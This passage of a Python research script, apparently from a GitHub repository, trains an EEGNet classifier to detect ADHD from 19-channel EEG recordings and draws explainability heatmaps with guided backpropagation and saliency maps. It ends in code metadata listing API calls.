self.batch_std3 = 0\n self.gamma3 = 0\n self.beta3 = 0\n self.activ_in1 = 0\n self.activ_out1 = 0\n self.activ_baseline_in1 = 0\n self.activ_baseline_out1 = 0\n self.activ_in2 = 0\n self.activ_out2 = 0\n self.activ_baseline_in2 = 0\n self.activ_baseline_out2 = 0\n\n def forward(self, inputdata):\n intermediate = self.conv1(inputdata)\n\n intermediate = self.batchnorm1(intermediate)\n\n intermediate = self.depthconv(intermediate)\n\n intermediate = self.batchnorm2(intermediate)\n\n intermediate = self.activ1(intermediate)\n\n intermediate = F.avg_pool2d(intermediate, (1, 4))\n\n intermediate = self.dropout(intermediate)\n\n intermediate = self.separable(intermediate)\n\n intermediate = self.batchnorm3(intermediate)\n\n intermediate = self.activ2(intermediate)\n\n intermediate = F.avg_pool2d(intermediate, (1, 8))\n\n intermediate = self.dropout(intermediate)\n\n intermediate = intermediate.view(intermediate.size()[0], -1)\n\n intermediate = self.fc1(intermediate)\n\n output = self.softmax(intermediate)\n print(output.shape)\n print(output)\n\n return output\n\n def update_softmax_forward(self):\n def softmax_forward_hook_function(module, ten_in, 
ten_out):\n return ten_in[0]\n\n handle = self.softmax.register_forward_hook(softmax_forward_hook_function)\n\n return handle\n\n # make the batch normalization layer a linear operation before applying backpropagation to remove the effects of other samples in the batch\n\n def update_batch_forward(self):\n def batch_forward_hook_function1(module, ten_in, ten_out):\n data = ten_in[0]\n batchmean1 = self.batch_mean1.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n batchstd1 = self.batch_std1.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n data = torch.div((ten_in[0] - batchmean1), batchstd1)\n gammamatrix = (self.gamma1).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n betamatrix = (self.beta1).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n output = data * gammamatrix + betamatrix\n\n return output\n\n def batch_forward_hook_function2(module, ten_in, ten_out):\n data = ten_in[0]\n batchmean2 = self.batch_mean2.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n batchstd2 = self.batch_std2.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n data = torch.div((ten_in[0] - batchmean2), batchstd2)\n gammamatrix = (self.gamma2).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n betamatrix = (self.beta2).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n output = data * gammamatrix + betamatrix\n\n return output\n\n def batch_forward_hook_function3(module, ten_in, ten_out):\n data = ten_in[0]\n batchmean3 = self.batch_mean3.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n batchstd3 = self.batch_std3.expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n data = torch.div((ten_in[0] - batchmean3), batchstd3)\n gammamatrix = (self.gamma3).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n betamatrix = (self.beta3).expand(int(data.size(0)), int(data.size(1)), int(data.size(2)),\n int(data.size(3)))\n\n output = data * gammamatrix + betamatrix\n\n return output\n\n handle1 = self.batchnorm1.register_forward_hook(batch_forward_hook_function1)\n handle2 = self.batchnorm2.register_forward_hook(batch_forward_hook_function2)\n handle3 = self.batchnorm3.register_forward_hook(batch_forward_hook_function3)\n\n return [handle1, handle2, handle3]\n\n # Save the batch mean and std\n\n def update_batch_forward_meanstd(self):\n def batch_forward_hook_function1(module, ten_in, ten_out):\n data = ten_in[0].clone().detach().requires_grad_(False).cpu().double()\n\n self.batch_mean1 = torch.mean(data, [0, 2, 3], True)\n self.batch_std1 = torch.sqrt(torch.mean((data - self.batch_mean1) ** 2, [0, 2, 3], True) + self.eps)\n\n self.gamma1 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n self.beta1 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n\n self.gamma1[0, :, 0, 0] = self.batchnorm1.weight.clone().detach().requires_grad_(False).cpu()\n self.beta1[0, :, 0, 0] = self.batchnorm1.bias.clone().detach().requires_grad_(False).cpu()\n\n def batch_forward_hook_function2(module, ten_in, ten_out):\n data = ten_in[0].clone().detach().requires_grad_(False).cpu().double()\n\n self.batch_mean2 = torch.mean(data, [0, 2, 3], True)\n self.batch_std2 = torch.sqrt(torch.mean((data - self.batch_mean2) ** 2, [0, 2, 3], True) + 
self.eps)\n\n self.gamma2 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n self.beta2 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n\n self.gamma2[0, :, 0, 0] = self.batchnorm2.weight.clone().detach().requires_grad_(False).cpu()\n self.beta2[0, :, 0, 0] = self.batchnorm2.bias.clone().detach().requires_grad_(False).cpu()\n\n def batch_forward_hook_function3(module, ten_in, ten_out):\n data = ten_in[0].clone().detach().requires_grad_(False).cpu().double()\n\n self.batch_mean3 = torch.mean(data, [0, 2, 3], True)\n self.batch_std3 = torch.sqrt(torch.mean((data - self.batch_mean3) ** 2, [0, 2, 3], True) + self.eps)\n\n self.gamma3 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n self.beta3 = torch.DoubleTensor(1, ten_in[0].size(1), 1, 1)\n\n self.gamma3[0, :, 0, 0] = self.batchnorm3.weight.clone().detach().requires_grad_(False).cpu()\n self.beta3[0, :, 0, 0] = self.batchnorm3.bias.clone().detach().requires_grad_(False).cpu()\n\n handle1 = self.batchnorm1.register_forward_hook(batch_forward_hook_function1)\n handle2 = self.batchnorm2.register_forward_hook(batch_forward_hook_function2)\n handle3 = self.batchnorm3.register_forward_hook(batch_forward_hook_function3)\n\n return [handle1, handle2, handle3]\n\n def update_activ_forward(self):\n def activ_forward_hook_function1(module, ten_in, ten_out):\n self.activ_in1 = ten_in[0].clone().detach().requires_grad_(False).cpu()\n self.activ_out1 = ten_out.clone().detach().requires_grad_(False).cpu()\n\n def activ_forward_hook_function2(module, ten_in, ten_out):\n self.activ_in2 = ten_in[0].clone().detach().requires_grad_(False).cpu()\n self.activ_out2 = ten_out.clone().detach().requires_grad_(False).cpu()\n\n handle1 = self.activ1.register_forward_hook(activ_forward_hook_function1)\n handle2 = self.activ2.register_forward_hook(activ_forward_hook_function2)\n #\n return [handle1, handle2]\n\n\n def update_activ_deconvolution(self):\n def activ_backward_hook_function(mmodule, grad_in, grad_out):\n modified_grad = torch.clamp(grad_out[0], min=0.0)\n\n return (modified_grad,)\n\n handle1 = self.activ1.register_backward_hook(activ_backward_hook_function)\n handle2 = self.activ2.register_backward_hook(activ_backward_hook_function)\n return [handle1, handle2]\n\n def update_activ_guidedbackpropogation(self):\n def activ_backward_hook_function1(mmodule, grad_in, grad_out):\n forwardpass = torch.where(self.activ_out1 > 0, torch.ones_like(self.activ_out1),torch.zeros_like(self.activ_out1))\n modified_grad = forwardpass * torch.clamp(grad_out[0], min=0.0)\n\n return (modified_grad,)\n\n def activ_backward_hook_function2(mmodule, grad_in, grad_out):\n forwardpass = torch.where(self.activ_out2 > 0, torch.ones_like(self.activ_out2),torch.zeros_like(self.activ_out2))\n modified_grad = forwardpass * torch.clamp(grad_out[0], min=0.0)\n\n return (modified_grad,)\n\n handle1 = self.activ1.register_backward_hook(activ_backward_hook_function1)\n handle2 = self.activ2.register_backward_hook(activ_backward_hook_function2)\n return [handle1, handle2]\n\n\nclass VisTech():\n def __init__(self, model):\n self.model = model\n self.model.eval()\n\n self.eps = 0.000001\n self.method = None\n\n def enhanceheatmap(self, heatmap, r=5):\n\n sampleChannel = heatmap.shape[0]\n sampleLength = heatmap.shape[1]\n\n newmap = np.zeros((sampleChannel, sampleLength))\n for i in range(sampleChannel):\n for j in range(sampleLength):\n if j < r:\n newmap[i, j] = np.mean(heatmap[i, :j + r])\n elif j + r > sampleLength:\n newmap[i, j] = np.mean(heatmap[i, j - r:])\n else:\n newmap[i, j] = 
np.mean(heatmap[i, j - r:j + r])\n\n return newmap\n\n def convert_batchlayer_to_linear(self, batchInput):\n\n handles = self.model.update_batch_forward_meanstd()\n self.model(batchInput)\n self.remove_registered_functions(handles)\n handles = self.model.update_batch_forward()\n\n return handles\n\n def remove_registered_functions(self, handles):\n for handle in handles:\n handle.remove()\n\n def heatmap_calculation_backpropogation(self, batchInput, sampleidx, method='EpsilonLRP'):\n # This function output the heatmaps generate with different interpretation techniques.\n # Most of the techques can be achieved by modifying the nonlinear activation layers\n\n def calculate_one_hot_out_put(output):\n result = output.cpu().detach().numpy()\n preds = result.argmax(axis=-1)\n one_hot_output = np.zeros(result.shape)\n\n for i in range(preds.shape[0]):\n one_hot_output[i, preds[i]] = 1\n\n one_hot_output = torch.DoubleTensor(one_hot_output)\n\n return one_hot_output\n\n sampleInput = batchInput\n sampleInput.requires_grad = True\n\n handles0 = self.convert_batchlayer_to_linear(batchInput)\n\n if method == \"guidedbackpropogation\":\n handles1 = self.model.update_activ_forward()\n handles2 = self.model.update_activ_guidedbackpropogation()\n\n output = self.model(sampleInput)\n one_hot_output = calculate_one_hot_out_put(output)\n output.backward(gradient=one_hot_output)\n grad = sampleInput.grad\n heatmap = grad.cpu().detach().numpy().squeeze()\n\n self.remove_registered_functions(handles1 + handles2)\n\n\n elif method == \"Saliencymap\":\n output = self.model(sampleInput)\n\n one_hot_output = calculate_one_hot_out_put(output)\n output.backward(gradient=one_hot_output)\n grad = sampleInput.grad\n heatmap = grad.cpu().detach().numpy().squeeze()\n\n\n self.remove_registered_functions(handles0)\n # the methods will generate heatmaps for a batch, otherwise return the heatmap for a sample\n if sampleidx != None:\n heatmap = heatmap[sampleidx]\n\n return heatmap\n\n\n def generate_interpretation(self, batchInput, sampleidx, subid, samplelabel, likelihood, method):\n\n if likelihood[0] > likelihood[1]: #likelihood of the sample to be classified into normal and adhd state\n state = 0\n else:\n state = 1\n\n if samplelabel == 0:\n labelstr = 'normal'\n else:\n labelstr = 'adhd'\n\n sampleInput = batchInput[sampleidx].cpu().detach().numpy().squeeze()\n sampleChannel = sampleInput.shape[0]\n sampleLength = sampleInput.shape[1]\n\n channelnames =['Fp1', 'Fp2', 'F7', 'F3', 'Fz', 'F4', 'F8', 'T7', 'C3', 'Cz', 'C4', 'T8','P7', 'P3', 'Pz', 'P4', 'P8', '01', '02']\n\n\n heatmap_sample_thres = 2\n heatmap_channel_thres = 1\n\n # generate the original sample and channel contribution maps\n heatmap = self.heatmap_calculation_backpropogation(batchInput=batchInput, sampleidx=sampleidx, method=method)\n heatmap_channel = np.mean(heatmap, axis=1)\n\n\n # Step 1: normalization\n heatmap = (heatmap - np.mean(heatmap)) / (np.std(heatmap))\n heatmap_channel = (heatmap_channel - np.mean(heatmap_channel)) / (np.std(heatmap_channel))\n\n # Step 2: thresholding\n heatmap_channel = heatmap_channel - heatmap_channel_thres\n heatmap = heatmap - heatmap_sample_thres\n\n # set values below lower bound of color map -1 to -1\n for u in range(sampleChannel):\n for l in range(sampleLength):\n if heatmap[u, l] < -1:\n heatmap[u, l] = -1\n # Step 3: smoothing\n smooth_factor = 5\n heatmap = self.enhanceheatmap(heatmap, smooth_factor)\n\n\n\n # draw the figure\n rowdivide = 4\n fig = plt.figure(figsize=(15, 9))\n gridlayout = 
gridspec.GridSpec(ncols=2, nrows=rowdivide, figure=fig, wspace=0.05, hspace=0.3)\n axs0 = fig.add_subplot(gridlayout[0:rowdivide - 1, 0])\n axs1 = fig.add_subplot(gridlayout[0:rowdivide - 1, 1])\n axs2 = fig.add_subplot(gridlayout[rowdivide - 1, :])\n\n axs2.xaxis.set_ticks([])\n axs2.yaxis.set_ticks([])\n\n # display the results\n axs2.text(0.01, 0.8, 'Model: EEGNET Interpretation: ' + method ,horizontalalignment='left', fontsize=15)\n fig.suptitle('Subject:' + str(int(subid)) + ' ' + 'Label:' + labelstr + ' ' + '$P_{normal}=$' + str(\n round(likelihood[0], 2)) + ' $P_{adhd}=$' + str(round(likelihood[1], 2)), y=0.985, fontsize=17)\n\n\n thespan = np.percentile(sampleInput, 98)\n xx = np.arange(1, sampleLength + 1)\n\n for i in range(0, sampleChannel):\n y = sampleInput[i, :] + thespan * (sampleChannel - 1 - i)\n dydx = heatmap[i, :]\n\n points = np.array([xx, y]).T.reshape(-1, 1, 2)\n segments = np.concatenate([points[:-1], points[1:]], axis=1)\n norm = plt.Normalize(-1, 1)\n lc = LineCollection(segments, cmap='viridis', norm=norm)\n lc.set_array(dydx)\n lc.set_linewidth(2)\n axs0.add_collection(lc)\n\n yttics = np.zeros(sampleChannel)\n for gi in range(sampleChannel):\n yttics[gi] = gi * thespan\n\n axs0.set_ylim([-thespan, thespan * sampleChannel])\n axs0.set_xlim([0, sampleLength + 1])\n axs0.set_xticks([1, 128, 256, 384,512])\n axs0.set_xticklabels(['0', '1', '2','3', '4(s)'])\n\n inversechannelnames = []\n for i in range(sampleChannel):\n inversechannelnames.append(channelnames[sampleChannel - 1 - i])\n\n plt.sca(axs0)\n plt.yticks(yttics, inversechannelnames)\n\n montage = 'standard_1020'\n sfreq = 128\n\n info = mne.create_info(\n channelnames,\n ch_types=['eeg', 'eeg', 'eeg', 'eeg', 'eeg', \\\n 'eeg', 'eeg', 'eeg', 'eeg', 'eeg', \\\n 'eeg', 'eeg', 'eeg', 'eeg', 'eeg', \\\n 'eeg', 'eeg', 'eeg', 'eeg'],\n sfreq=sfreq\n )\n\n electrodes_coordinates = get_electrodes_coordinates(channelnames)\n # print(electrodes_coordinates)\n dig_points = get_electrodes_positions(channelnames, electrodes_coordinates)\n _,info = set_electrodes_montage(channelnames, electrodes_coordinates,sampleInput)\n\n im, cn = mne.viz.plot_topomap(data=heatmap_channel, pos=info, vmin=-1, vmax=1, axes=axs1, names=channelnames,\n show_names=True, outlines='head', cmap='viridis', show=False)\n fig.colorbar(im, ax=axs1)\n plt.show()\n\ndef plot_roc(fpr, tpr):\n plt.plot(fpr, tpr, label = 'ROC curve', linewidth = 2)\n plt.plot([0,1],[0,1], 'k--', linewidth = 2)\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('ROC Curve ')\n plt.show()\ndef plot_cm(cm):\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n plt.colorbar()\n plt.tight_layout()\n plt.xlabel('Predicted label')\n plt.ylabel('True label')\n\ndef specificity(y_true, y_pred):\n tn = sum((y_true == 0) & (y_pred == 0))\n fp = sum((y_true == 0) & (y_pred == 1))\n return tn / (tn + fp)\ndef sensitivity(y_true, y_pred):\n tp = sum((y_true == 1) & (y_pred == 1))\n fn = sum((y_true == 1) & (y_pred == 0))\n return tp / (tp + fn)\n\n\ndef run():\n\n\n channelnum = 19\n subjnum =120\n samplelength = 4\n sf = 128\n\n # define the learning rate, batch size and epoches\n lr = 1e-3\n batch_size = 32\n n_epoch = 2\n\n x_data, y_data, subIdx = data_load(PATH_DATASET_MAT)\n x_data = np.swapaxes(x_data, 2, 0)\n y_data = np.swapaxes(y_data, 1, 0)\n subIdx = np.swapaxes(subIdx, 1, 0)\n print(y_data[0:600, 1:4])\n print('x_data.shape: ', x_data.shape)\n print('y_data.shape: ', y_data.shape)\n print(subIdx)\n subIdx.astype(int)\n\n\n 
samplenum = y_data.shape[0]\n label = y_data[:, 0]\n print(\"laaaaaaaaaaabel\",label.shape)\n print(np.unique(subIdx))\n\n # ydata contains the label of samples\n ydata = np.zeros(samplenum, dtype=np.longlong)\n\n # the result stores accuracies of every subject\n results = []\n\n for i in range(samplenum):\n ydata[i] = label[i]\n\n X_train_org, X_test_org, y_train_org, y_test_org = train_test_split(x_data, y_data, test_size=0.2, shuffle=True,\n random_state=42)\n\n # select the subject index here\n for i in range(1, subjnum + 1):\n # form the training data\n trainindx = np.where(subIdx != i)[0]\n xtrain = x_data[trainindx]\n x_train = xtrain.reshape(xtrain.shape[0], 1, channelnum, samplelength * sf)\n y_train = ydata[trainindx]\n\n # form the testing data\n testindx = np.where(subIdx == i)[0]\n xtest = x_data[testindx]\n x_test = xtest.reshape(xtest.shape[0], 1, channelnum, samplelength * sf)\n y_test = ydata[testindx]\n\n train = torch.utils.data.TensorDataset(torch.from_numpy(x_train), torch.from_numpy(y_train))\n train_loader = torch.utils.data.DataLoader(train, batch_size=batch_size, shuffle=True)\n\n # select the deep learning model to be used\n #my_net = InterpretableCNN().double()\n my_net = EEGNet().double()\n\n for p in my_net.parameters():\n p.requires_grad = True\n\n optimizer = optim.Adam(my_net.parameters(), lr=lr)\n loss_class = torch.nn.NLLLoss()\n # Define ReduceLROnPlateau scheduler\n scheduler = ReduceLROnPlateau(optimizer, mode='min', patience=10, verbose=True)\n\n # Define early stopping parameters\n early_stopping = {\n 'patience': 20, # Number of epochs with no improvement after which training will be stopped\n 'min_delta': 0.001, # Minimum change in validation loss to be considered as an improvement\n 'best_loss': float('inf'), # Initialize with a large value\n 'counter': 0 # Counter for the number of epochs with no improvement\n }\n\n # Tensorboard writer for logging\n\n\n train_accuracies = []\n val_accuracies = []\n\n # to track the training loss as the model trains\n train_losses = []\n # to track the validation loss as the model trains\n valid_losses = []\n # to track the average training loss per epoch as the model trains\n avg_train_losses = []\n # to track the average validation loss per epoch as the model trains\n avg_valid_losses = []\n\n patience = 20\n # initialize the early_stopping object\n early_stopping = EarlyStopping(patience=patience, verbose=True)\n\n # train the classifier\n for epoch in range(1,n_epoch+1):\n for j, data in enumerate(train_loader, 0):\n inputs, labels = data\n\n input_data = inputs\n class_label =labels\n #class_label = labels.view(-1, 1 ).double() for BCELoss\n\n train_loss =0.0\n\n my_net.zero_grad()\n my_net.train()\n\n class_output = my_net(input_data)\n err_s_label = loss_class(class_output, class_label)\n err = err_s_label\n\n err.backward()\n optimizer.step()\n train_loss += err.item()\n # record training loss\n train_losses.append(err.item())\n\n # Calculate average training loss for the epoch\n avg_train_loss = train_loss / len(train_loader)\n print(\"train loss avg\",avg_train_loss)\n\n my_net.eval()\n val_loss =0.0\n with torch.no_grad():\n\n x_test = torch.DoubleTensor(x_test)\n answer = my_net(x_test)\n print(\"y_test\",y_test)\n y_test = torch.from_numpy(y_test)\n #y_test=y_test.view(-1,1).double() for BCELoss\n print(type(y_test))\n loss = loss_class(answer, y_test)\n val_loss += loss.item()\n valid_losses.append(loss.item())\n probs = np.exp(answer.cpu().numpy())\n print(\"probs\",probs)\n\n preds = 
probs.argmax(axis=-1)\n print(\"preds\",preds)\n acc = accuracy_score(y_test, preds)\n precision = precision_score(y_test, preds)\n recall = recall_score(y_test, preds)\n f1 = f1_score(y_test, preds)\n\n print(acc)\n print(precision)\n print(recall)\n print(f1)\n print(\"val loss\",val_loss)\n print(valid_losses)\n print(specificity(y_test, preds))\n print(sensitivity(y_test, preds))\n results.append(acc)\n fpr, tpr, t = roc_curve(y_test, preds)\n cm = confusion_matrix(y_test, preds,labels=[0,1])\n print(\"conv matrix\",cm)\n #plot_roc(fpr, tpr)\n plot_cm(cm)\n\n # print training/validation statistics\n # calculate average loss over an epoch\n train_loss = np.average(train_losses)\n valid_loss = np.average(valid_losses)\n avg_train_losses.append(train_loss)\n avg_valid_losses.append(valid_loss)\n\n epoch_len = len(str(n_epoch))\n\n print_msg = (f'[{epoch:>{epoch_len}}/{n_epoch:>{epoch_len}}] ' +f'train_loss: {train_loss:.5f} ' +f'valid_loss: {valid_loss:.5f}')\n print(print_msg)\n\n # clear lists to track next epoch\n train_losses = []\n valid_losses = []\n\n # load the last checkpoint with the best model\n #my_net.load_state_dict(torch.load('checkpoint.pt'))\n\n # early_stopping needs the validation loss to check if it has decresed,\n # and if it has, it will make a checkpoint of the current model\n early_stopping(valid_loss, my_net)\n\n if early_stopping.early_stop:\n print(\"Early stopping\")\n break\n\n\n print('mean accuracy:', np.mean(results))\n\n\n\n # Save the trained model to a file\n torch.save(my_net.state_dict(), 'trained_cnn_model.pth')\n sampleVis = VisTech(my_net)\n\n # select the interpretation method to be used\n method=\"guidedbackpropogation\"\n # method=\"Saliencymap\"\n ########################################\n\n sampleidx = 8\n sampleVis.generate_interpretation(batchInput=x_test, sampleidx=sampleidx, subid=i,\n samplelabel=y_test[sampleidx], likelihood=probs[sampleidx], method=method)\n\n\ntorch.cuda.empty_cache()\n\n\n\nif __name__ == '__main__':\n run()\n", "repo_name": "ahmedguebsi/XAI_ADHD_Detection", "sub_path": "adhd_deep/xai_all.py", "file_name": "xai_all.py", "file_ext": "py", "file_size_in_byte": 27274, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.cuda.empty_cache", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 31, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "attribute"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 46, "usage_type": "call"}, {"api_name": 
"torch.nn", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.nn.ELU", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.nn.ELU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "attribute"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.functional.avg_pool2d", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.div", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 213, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 214, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 216, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 217, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.zeros_like", 
"line_number": 261, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.DoubleTensor", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 384, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 388, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 388, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 389, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 408, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 408, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 409, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 409, "usage_type": "name"}, {"api_name": "numpy.percentile", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 430, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 431, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Normalize", "line_number": 432, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 432, "usage_type": "name"}, {"api_name": "matplotlib.collections.LineCollection", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 438, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.sca", "line_number": 451, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 451, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 452, "usage_type": "name"}, {"api_name": "mne.create_info", "line_number": 457, "usage_type": "call"}, {"api_name": "electrodes_positions.get_electrodes_coordinates", "line_number": 466, "usage_type": "call"}, {"api_name": "electrodes_positions.get_electrodes_positions", "line_number": 468, "usage_type": "call"}, {"api_name": "electrodes_positions.set_electrodes_montage", "line_number": 469, "usage_type": "call"}, {"api_name": "mne.viz.plot_topomap", "line_number": 471, "usage_type": "call"}, {"api_name": "mne.viz", "line_number": 471, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 474, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 474, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 477, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 477, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 478, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 478, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 479, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 479, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 480, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 480, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", 
"line_number": 481, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 481, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 482, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 482, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 484, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 484, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 484, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 485, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 485, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 486, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 486, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 487, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 487, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 488, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 488, "usage_type": "name"}, {"api_name": "adhd_classification.data_load", "line_number": 513, "usage_type": "call"}, {"api_name": "numpy.swapaxes", 